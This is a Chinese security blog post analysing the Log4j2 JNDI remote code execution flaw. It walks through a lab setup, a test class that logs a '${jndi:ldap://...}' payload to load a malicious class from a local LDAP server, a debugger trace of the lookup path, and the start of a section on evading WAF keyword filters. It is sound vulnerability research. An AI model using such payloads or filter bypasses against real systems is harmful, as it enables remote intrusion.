<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="作者：Narcher	时间：2024&#x2F;4&#x2F;25	分类：Vulnerability Analysis">
<meta property="og:type" content="article">
<meta property="og:title" content="JAVA安全:Log4j2远程代码执行漏洞">
<meta property="og:url" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="Narcherの小窝">
<meta property="og:description" content="作者：Narcher	时间：2024&#x2F;4&#x2F;25	分类：Vulnerability Analysis">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1713968846203.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1713969050181.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1713969162132.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1713969234358.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1713969309933.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714011476421.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714012567406.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714012809424.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714013246124.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714013604173.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714013773693.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714013962769.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714014043181.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714014277699.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714014321667.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714014370327.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714014473035.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714014696337.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714015038887.png">
<meta property="og:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714016041489.png">
<meta property="article:published_time" content="2024-04-25T06:52:22.999Z">
<meta property="article:modified_time" content="2024-04-25T06:51:02.642Z">
<meta property="article:author" content="Narcher Alter">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1713968846203.png">

<link rel="canonical" href="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>JAVA安全:Log4j2远程代码执行漏洞 | Narcherの小窝</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Narcherの小窝</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Narcher Alter">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Narcherの小窝">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          JAVA安全:Log4j2远程代码执行漏洞
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2024-04-25 14:52:22 / Modified: 14:51:02" itemprop="dateCreated datePublished" datetime="2024-04-25T14:52:22+08:00">2024-04-25</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><em>作者：Narcher</em>	<em>时间：2024&#x2F;4&#x2F;25</em>	<em>分类：Vulnerability Analysis</em></p>
<span id="more"></span>

<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>因为在做NSSCTF题库里边的Java题的时候，碰到了一个Fastjson反序列化+Log4j的漏洞。前边学习了Fastjson反序列化漏洞，而Log4j漏洞比较老了，Log4j2漏洞比较新，于是就开始学习一下Log4j2的远程代码执行漏洞。</p>
<p>Apache Log4j 2是一个开源的日志记录组件，使用非常的广泛。在工程中以易用方便代替了 System.out 等打印语句，它是JAVA下最流行的日志输入工具。</p>
<p>使用 Log4j 2 在一定场景条件下处理恶意数据时，可能会造成注入类代码执行。下面我们来看一下具体流程。</p>
<h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><h3 id="1-环境搭建"><a href="#1-环境搭建" class="headerlink" title="1.环境搭建"></a>1.环境搭建</h3><p>新建maven项目，在pom.xml中加入以下依赖：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.apache.logging.log4j<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>log4j-core<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>2.14.1<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.apache.logging.log4j<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>log4j-api<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>2.14.1<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>junit<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>junit<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>4.12<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">scope</span>&gt;</span>test<span class="tag">&lt;/<span class="name">scope</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>至于jdk版本，我用的是8u65，因为Log4j的2.13版本以上对1.8版本之前的不兼容嘛，但要低于8u191，因为之后的版本对于从请求ldap服务并获取Codebase路径之后，在请求Codebase下载Class文件流程中的请求Codebase过程中默认关闭了trustUrlCodebase，所以不会去请求Codebase</p>
<p>然后日志也要输出，我们在src&#x2F;main&#x2F;resources目录下添加一个log4j2.xml文件，内容如下：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">configuration</span> <span class="attr">status</span>=<span class="string">&quot;info&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">Properties</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Property</span> <span class="attr">name</span>=<span class="string">&quot;pattern1&quot;</span>&gt;</span>[%-5p] %d %c - %m%n<span class="tag">&lt;/<span class="name">Property</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Property</span> <span class="attr">name</span>=<span class="string">&quot;pattern2&quot;</span>&gt;</span></span><br><span class="line">            =========================================%n 日志级别：%p%n 日志时间：%d%n 所属类名：%c%n 所属线程：%t%n 日志信息：%m%n</span><br><span class="line">        <span class="tag">&lt;/<span class="name">Property</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Property</span> <span class="attr">name</span>=<span class="string">&quot;filePath&quot;</span>&gt;</span>logs/myLog.log<span class="tag">&lt;/<span class="name">Property</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">Properties</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">appenders</span>&gt;</span> <span class="tag">&lt;<span class="name">Console</span> <span class="attr">name</span>=<span class="string">&quot;Console&quot;</span> <span class="attr">target</span>=<span class="string">&quot;SYSTEM_OUT&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">PatternLayout</span> <span class="attr">pattern</span>=<span class="string">&quot;$&#123;pattern1&#125;&quot;</span>/&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">Console</span>&gt;</span> <span class="tag">&lt;<span class="name">RollingFile</span> <span class="attr">name</span>=<span class="string">&quot;RollingFile&quot;</span> <span class="attr">fileName</span>=<span class="string">&quot;$&#123;filePath&#125;&quot;</span></span></span><br><span class="line"><span class="tag">                            <span class="attr">filePattern</span>=<span class="string">&quot;logs/$$&#123;date:yyyy-MM&#125;/app-%d&#123;MM-dd-yyyy&#125;-%i.log.gz&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">PatternLayout</span> <span class="attr">pattern</span>=<span class="string">&quot;$&#123;pattern2&#125;&quot;</span>/&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">SizeBasedTriggeringPolicy</span> <span class="attr">size</span>=<span class="string">&quot;5 MB&quot;</span>/&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">RollingFile</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">appenders</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">loggers</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">root</span> <span class="attr">level</span>=<span class="string">&quot;info&quot;</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">appender-ref</span> <span class="attr">ref</span>=<span class="string">&quot;Console&quot;</span>/&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">appender-ref</span> <span class="attr">ref</span>=<span class="string">&quot;RollingFile&quot;</span>/&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">loggers</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">configuration</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>而其具体的输出则会输出到logs目录下的myLog.log文件中</p>
<p>之后的测试代码我也从这里贴出来：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.logging.log4j.LogManager;</span><br><span class="line"><span class="keyword">import</span> org.apache.logging.log4j.Logger;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.util.function.LongFunction;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Test2</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">        <span class="type">Logger</span> <span class="variable">logger</span> <span class="operator">=</span> LogManager.getLogger(LongFunction.class);</span><br><span class="line">        <span class="type">String</span> <span class="variable">username</span> <span class="operator">=</span> <span class="string">&quot;$&#123;jndi:ldap://127.0.0.1:7777/TestRef&#125;&quot;</span>;</span><br><span class="line">        logger.info(<span class="string">&quot;User &#123;&#125; login in!&quot;</span>, username);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>整个项目差不多长这样，Test.java不用管：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1713968846203.png" alt="1713968846203" style="zoom: 50%;">

<h3 id="2-漏洞复现"><a href="#2-漏洞复现" class="headerlink" title="2.漏洞复现"></a>2.漏洞复现</h3><p>如果我们正常传入username，输出如下：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1713969050181.png" alt="1713969050181" style="zoom:50%;">

<p>而在其官方文档<a target="_blank" rel="noopener" href="https://logging.apache.org/log4j/2.x/manual/lookups.html">Log4j – Log4j 2 Lookups (apache.org)</a>中提到了这样的一个东西：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1713969162132.png" alt="1713969162132" style="zoom:50%;">

<p>我们把username修改成${java:os}看一下情况：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1713969234358.png" alt="1713969234358" style="zoom:50%;">

<p>输出了os的版本，这个的危害倒也不是很大，真正有危害的是下边的这个：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1713969309933.png" alt="1713969309933" style="zoom:67%;">

<p>支持jndi查询，这样的话，如果目标出网，我们就可以利用Jndi注入远程执行恶意代码，具体流程如下：</p>
<p>在本地恶意类TestRef.class的目录处起一个http服务，之后再叠一个ldap服务，具体代码在Fastjson的复现里贴了，这里就不再搬过来了。服务搭建起来后运行Test2即可远程加载恶意类进行命令执行：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714011476421.png" alt="1714011476421" style="zoom:50%;">

<p>发现成功弹出计算器，并且貌似命令还执行了两遍，我们下面来调试看看具体流程</p>
<h3 id="3-漏洞分析"><a href="#3-漏洞分析" class="headerlink" title="3.漏洞分析"></a>3.漏洞分析</h3><p>这里是跟着Drun1baby师傅的思路走的，其实刚开始打了几个断点准备从头开始一点点看， 但等看到PatternLayout这个类之后发现确实重点在这后边，前边都是些赋值之类的操作</p>
<p>从PatternLayout类的toSerializable方法开始打个断点：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714012567406.png" alt="1714012567406" style="zoom:67%;">

<p>这里的传参中，event包含了我们的传参，此刻buffer还为空，我们继续往下看：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714012809424.png" alt="1714012809424" style="zoom:67%;">

<p>进入了这个for循环之后就加上调用format方法给buffer赋值，大致流程如下：</p>
<p>先进入format方法：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714013246124.png" alt="1714013246124" style="zoom:67%;">

<p>然后会根据skipFormattingInfo的情况分别进入不同的情况，这里进入的format方法取决于this的converter的值：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714013604173.png" alt="1714013604173" style="zoom:50%;">

<p>像上图这种就会进入LiteralPatternConverter类的format方法中</p>
<p>就这样循环了7次后，会进入MessagePatternConverter类的format方法：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714013773693.png" alt="1714013773693" style="zoom:67%;">

<p>这里有个关键的字符串提取，先判断字符串中是否有${的组合，之后会提取出${}之间的所有字符，我们跟进StrSubstitutor类的replace方法看一看：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714013962769.png" alt="1714013962769" style="zoom:50%;">

<p>之后会进入StrSubstitutor类的substitute方法（在307行）：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714014043181.png" alt="1714014043181" style="zoom:67%;">

<p>之后这个substitute方法接着调用311行的substitute方法，这里边经过一系列的判断之后，会提取出${}之间的所有字符的所有字符，并赋值给varName：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714014277699.png" alt="1714014277699" style="zoom:67%;">

<p>之后会进入resolveVariable方法：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714014321667.png" alt="1714014321667" style="zoom:67%;">

<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714014370327.png" alt="1714014370327" style="zoom:67%;">

<p>这里的resolver通过getVariableResolver获取到了如下的值，可见不止有jndi，我们可以判断出这里提到的值都可以在以后利用：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714014473035.png" alt="1714014473035" style="zoom:67%;">

<p>可以发现该方法的具体流程中有lookup方法，不确定是不是我们需要的Jndi的lookup方法，跟进看一看：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714014696337.png" alt="1714014696337" style="zoom:67%;">

<p>可见这里还不是我们想要的Jndi的lookup方法，这里的是Interpolator类的lookup方法，它提取出来了:之前的值，即jndi，并获取JndiLookup类,最终在163行这里调用JndiLookup类的lookup方法：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714015038887.png" alt="1714015038887" style="zoom:67%;">

<p>之后便是一系列的Jndi注入的流程</p>
<p>至于为什么会触发两次，我调试看了看，大致是因为在加载的时候在命令行打印前会触发一遍，之后写入日志中还会触发一遍(这个我看了网上不少文章，但貌似师傅们都没有提到这一点)</p>
<h3 id="4-Bypass"><a href="#4-Bypass" class="headerlink" title="4.Bypass"></a>4.Bypass</h3><p>网上很多的WAF都是基于对jndi关键字的过滤，因为在官方文档中有这么一句话：</p>
<img src="/2024/04/25/JAVA%E5%AE%89%E5%85%A8Log4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1714016041489.png" alt="1714016041489" style="zoom: 67%;">

<p>如果USER这个环境变量未设置，就会使用默认值，而这肯定不是我们希望的，下面来看一看如何进行jndi关键字的绕过：</p>
